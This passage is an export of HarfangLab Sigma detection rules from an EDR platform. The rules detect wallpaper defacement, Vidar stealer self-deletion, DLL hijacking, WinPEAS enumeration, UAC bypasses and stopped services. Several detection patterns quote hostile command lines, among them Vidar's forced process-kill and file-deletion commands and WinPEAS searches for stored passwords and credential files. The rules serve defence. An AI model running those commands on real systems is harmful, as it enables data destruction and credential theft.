?:\\ProgramData\\Amazon\\EC2-Windows\\Launch\\Module\\Ec2Launch.psd1; Set-Wallpaper'\n Details: '*\\AppData\\Local\\Ec2Wallpaper_Info.jpg'\n\n exclusion_intune:\n ProcessParentImage: '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n\n exclusion_wallpaperchangescheduler:\n ProcessOriginalFileName: 'WallpaperChangeScheduler.exe'\n ProcessCompany: 'FutureSight Technologies'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\n# level: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6abfcbb6-635b-4d06-9f3c-96545e9ac929",
"rule_name": "User's Wallpaper Modified",
"rule_description": "Detects a modification of the user's desktop wallpaper via a registry modification.\nThis technique is often seen during ransomware deployment. An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the organization.\nDisturbing or offensive images may be used as a part of Internal Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.\nIt is recommended to check if this modification is the result of a legitimate action.\n",
"rule_creation_date": "2024-06-24",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1491.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ac8ae28-b9f5-4dd1-897f-8aacbdde35c6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611003Z",
"creation_date": "2026-03-23T11:45:34.611006Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611014Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/",
"https://blog.cyble.com/2021/10/26/vidar-stealer-under-the-lens-a-deep-dive-analysis/",
"https://attack.mitre.org/techniques/T1587/001/",
"https://attack.mitre.org/techniques/T1539/",
"https://attack.mitre.org/techniques/T1087/",
"https://attack.mitre.org/techniques/T1095/"
],
"name": "t1587_001_vidar_trojan_usage.yml",
"content": "title: Possible Vidar Stealer Command-line Execution\nid: 6ac8ae28-b9f5-4dd1-897f-8aacbdde35c6\ndescription: |\n Detects suspicious command-lines usually associated with the Vidar Stealer self-deleting.\n Vidar is a forked malware based on Arkei and is designed to steal credentials from victims' devices, including but not limited to banking information, crypto wallets and browser credentials.\n It is recommended to analyze the process responsible for the execution of this command-line and to analyze all child processes stemming from cmd.exe.\nreferences:\n - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/\n - https://blog.cyble.com/2021/10/26/vidar-stealer-under-the-lens-a-deep-dive-analysis/\n - https://attack.mitre.org/techniques/T1587/001/\n - https://attack.mitre.org/techniques/T1539/\n - https://attack.mitre.org/techniques/T1087/\n - https://attack.mitre.org/techniques/T1095/\ndate: 2022/10/20\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1587.001\n - attack.t1539\n - attack.t1087\n - attack.t1095\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Stealer.Vidar\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\cmd.exe'\n CommandLine|contains:\n - '/c taskkill /im *.exe /f & timeout /t 6 & del /f /q *.exe & del ?:\\PrograData\\\\*.dll & exit' # There really is a typo\n - '/c taskkill /im *.exe /f & timeout /t 6 & del /f /q \"*.exe\" & del ?:\\ProgramData\\\\*.dll & exit'\n - '/c taskkill /im *.exe /f & erase *.exe & exit'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ac8ae28-b9f5-4dd1-897f-8aacbdde35c6",
"rule_name": "Possible Vidar Stealer Command-line Execution",
"rule_description": "Detects suspicious command-lines usually associated with the Vidar Stealer self-deleting.\nVidar is a forked malware based on Arkei and is designed to steal credentials from victims' devices, including but not limited to banking information, crypto wallets and browser credentials.\nIt is recommended to analyze the process responsible for the execution of this command-line and to analyze all child processes stemming from cmd.exe.\n",
"rule_creation_date": "2022-10-20",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1087",
"attack.t1095",
"attack.t1539",
"attack.t1587.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6add9385-b6ca-466e-bd6a-b299f4efd32f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589388Z",
"creation_date": "2026-03-23T11:45:34.589391Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589399Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_repadmin.yml",
"content": "title: DLL Hijacking via repadmin.exe\nid: 6add9385-b6ca-466e-bd6a-b299f4efd32f\ndescription: |\n Detects potential Windows DLL Hijacking via repadmin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'repadmin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\certcli.dll'\n - '\\dnsapi.dll'\n - '\\dsrole.dll'\n - '\\logoncli.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n - '\\secur32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6add9385-b6ca-466e-bd6a-b299f4efd32f",
"rule_name": "DLL Hijacking via repadmin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via repadmin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6b267200-d21d-471d-8ebe-6571ed2f02fb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606576Z",
"creation_date": "2026-03-23T11:45:34.606579Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606586Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS",
"https://attack.mitre.org/techniques/T1082/",
"https://attack.mitre.org/techniques/T1592/",
"https://attack.mitre.org/tactics/TA0004/"
],
"name": "t1082_winpeas_cmds.yml",
"content": "title: WinPEAS HackTool Enumeration Batch Job Executed\nid: 6b267200-d21d-471d-8ebe-6571ed2f02fb\ndescription: |\n Detects specific WinPEAS (Windows Privilege Escalation Awesome Scripts) commands.\n WinPEAS is a tool used in post-exploitation phases to automatically discover privilege escalation vectors through misconfigurations, vulnerable services, and sensitive credential files.\n It is recommended to check if the usage of WinPEAS is legitimate as well as to investigate the user context and look for subsequent privilege escalation attempts.\nreferences:\n - https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS\n - https://attack.mitre.org/techniques/T1082/\n - https://attack.mitre.org/techniques/T1592/\n - https://attack.mitre.org/tactics/TA0004/\ndate: 2022/10/19\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - attack.reconnaissance\n - attack.t1592.001\n - attack.t1592.002\n - attack.t1592.004\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1222.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.WinPEAS\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n info_printing:\n Image|endswith: '\\cmd.exe'\n ParentImage|endswith: '\\forfiles.exe'\n CommandLine|contains:\n - 'UNQUOTED SERVICE PATHS'\n - 'SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS'\n - 'DLL HIJACKING in PATHenv variable'\n - 'CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY'\n\n enumerating_winlogon:\n Image|endswith: '\\findstr.exe'\n CommandLine|contains: 'findstr ?i DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername'\n\n enumerating_run_startup:\n Image|endswith: '\\findstr.exe'\n CommandLine|contains: 'findstr ?v ?i \"disable deshab informa\")'\n\n enumerating_credentials:\n Image|endswith: '\\cmd.exe'\n CommandLine|contains: 
'RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies'\n\n enumerating_antivirus:\n Image|endswith: '\\WMIC.exe'\n CommandLine|contains: 'WMIC ?Node:localhost ?Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName ?Format:List'\n\n enumerating_winrm:\n Image|endswith: '\\cmd.exe'\n CommandLine|contains: '?c sc qc WinRM | findstr BINARY_PATH_NAME | findstr ?i ?v ?l ?c:?:\\windows\\system32 | findstr ?v /c:'\n\n condition: 1 of enumerating_* or info_printing\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6b267200-d21d-471d-8ebe-6571ed2f02fb",
"rule_name": "WinPEAS HackTool Enumeration Batch Job Executed",
"rule_description": "Detects specific WinPEAS (Windows Privilege Escalation Awesome Scripts) commands.\nWinPEAS is a tool used in post-exploitation phases to automatically discover privilege escalation vectors through misconfigurations, vulnerable services, and sensitive credential files.\nIt is recommended to check if the usage of WinPEAS is legitimate as well as to investigate the user context and look for subsequent privilege escalation attempts.\n",
"rule_creation_date": "2022-10-19",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1082",
"attack.t1222.001",
"attack.t1592.001",
"attack.t1592.002",
"attack.t1592.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6b391800-cce0-4884-8edc-4be9d0b7daae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092372Z",
"creation_date": "2026-03-23T11:45:34.092374Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092378Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_mmc_atl_mmcex.yml",
"content": "title: DLL Related to UAC Bypass Loaded by mmc.exe\nid: 6b391800-cce0-4884-8edc-4be9d0b7daae\ndescription: |\n Detects a suspicious DLL being loaded by mmc.exe.\n Adversaries may abuse a COM object's auto-elevation mechanism to write a DLL in an arbitrary path and then execute mmc.exe to execute arbitrary code with elevated privileges for UAC bypass.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the behavior of mmc.exe and to identify the process responsible for the DLL file creation.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2024/10/08\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_process:\n ProcessOriginalFileName: 'mmc.exe'\n\n selection_variant_1:\n ProcessCommandLine|contains: 'WmiMgmt.msc'\n ImageLoaded|endswith: '\\ATL.DLL'\n Signed: 'false'\n\n selection_variant_2:\n ImageLoaded|endswith: '\\MMCEx.ni.dll'\n Signed: 'false'\n\n exclusion_mmcex_microsoft:\n ImageLoaded|endswith: '?:\\Windows\\assembly\\NativeImages_*_??\\MMCEx\\\\*\\MMCEx.ni.dll'\n Company: 'Microsoft Corporation'\n Description: 'MMCEx'\n\n condition: selection_process and 1 of selection_variant_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6b391800-cce0-4884-8edc-4be9d0b7daae",
"rule_name": "DLL Related to UAC Bypass Loaded by mmc.exe",
"rule_description": "Detects a suspicious DLL being loaded by mmc.exe.\nAdversaries may abuse a COM object's auto-elevation mechanism to write a DLL in an arbitrary path and then execute mmc.exe to execute arbitrary code with elevated privileges for UAC bypass.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the behavior of mmc.exe and to identify the process responsible for the DLL file creation.\n",
"rule_creation_date": "2024-10-08",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6b4a72fc-da92-4c5d-af69-3f604fd5dd03",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089770Z",
"creation_date": "2026-03-23T11:45:34.089772Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089776Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1489/",
"https://attack.mitre.org/techniques/T1569/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1489_systemd_service_stop.yml",
"content": "title: Suspicious SystemD Service Stopped\nid: 6b4a72fc-da92-4c5d-af69-3f604fd5dd03\ndescription: |\n Detects a sensitive SystemD service being manually stopped using the systemd binary.\n Adversaries may stop services on a system to render those services unavailable to legitimate users or to impair the security tools already installed.\n It is recommended to analyze the behavior of the user performing this action around the alert to look for malicious content or actions.\nreferences:\n - https://attack.mitre.org/techniques/T1489/\n - https://attack.mitre.org/techniques/T1569/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/12/15\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1489\n - attack.execution\n - attack.t1569\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.ServiceStop\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_systemctl:\n Image|endswith: '/systemctl'\n CommandLine|contains:\n - ' kill '\n - ' stop '\n\n selection_service:\n CommandLine|contains:\n - ' mysql'\n - ' ssh'\n - ' cron'\n - ' libvirtd'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n 
exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n exclusion_snapd:\n ProcessParentImage: '/snap/snapd/*/usr/lib/snapd/snapd'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_puppet:\n - ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - GrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_parent_commandline:\n ProcessParentCommandLine:\n - '/bin/sh /usr/sbin/invoke-rc.d * stop'\n - 'bash -c . /opt/wab/share/common/service-management.bash; relax_system'\n - '/bin/bash /usr/local/bin/backup_mysql_bi'\n - '/usr/bin/monit -c /etc/monit/monitrc'\n - '/usr/bin/python /home/*/.ansible/tmp/ansible-tmp-*/ansiballz_*.py'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6b4a72fc-da92-4c5d-af69-3f604fd5dd03",
"rule_name": "Suspicious SystemD Service Stopped",
"rule_description": "Detects a sensitive SystemD service being manually stopped using the systemd binary.\nAdversaries may stop services on a system to render those services unavailable to legitimate users or to impair the security tools already installed.\nIt is recommended to analyze the behavior of the user performing this action around the alert to look for malicious content or actions.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-01-09",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1489",
"attack.t1562.001",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6b59f2b7-766d-4f2f-9527-e99d9058eb37",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077738Z",
"creation_date": "2026-03-23T11:45:34.077740Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077745Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/L3cr0f/DccwBypassUAC"
],
"name": "uac_bypass_dccw.yml",
"content": "title: UAC Bypass Executed via dccw.exe\nid: 6b59f2b7-766d-4f2f-9527-e99d9058eb37\ndescription: |\n Detects the dccw.exe process loading an unsigned GdiPlus.dll.\n This may be indicative of a UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the loaded DLL and the user session responsible to look for malicious content or actions.\nreferences:\n - https://github.com/L3cr0f/DccwBypassUAC\ndate: 2020/10/14\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: 'Windows\\System32\\dccw.exe'\n ImageLoaded: '*\\Windows\\System32\\dccw.exe.local\\\\*\\GdiPlus.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6b59f2b7-766d-4f2f-9527-e99d9058eb37",
"rule_name": "UAC Bypass Executed via dccw.exe",
"rule_description": "Detects the dccw.exe process loading an unsigned GdiPlus.dll.\nThis may be indicative of a UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the loaded DLL and the user session responsible to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-14",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6b6a4571-da9f-4a59-95d2-54764f10e54d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089678Z",
"creation_date": "2026-03-23T11:45:34.089680Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089685Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_hidden_temporary_path_file_execution.yml",
